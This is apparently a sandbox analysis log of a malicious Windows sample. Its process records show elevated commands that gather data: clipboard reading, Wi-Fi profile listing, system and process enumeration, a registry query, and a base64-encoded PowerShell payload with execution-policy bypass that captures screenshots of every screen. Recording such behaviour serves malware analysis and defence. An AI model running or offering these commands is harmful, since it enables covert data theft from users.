                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:05:22:07
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:05:22:08
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                                            Imagebase:0x7ff64dbf0000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                            Start time:05:22:10
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                            Start time:05:22:11
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                            Imagebase:0x7ff78bf20000
                                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                            Start time:05:22:11
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
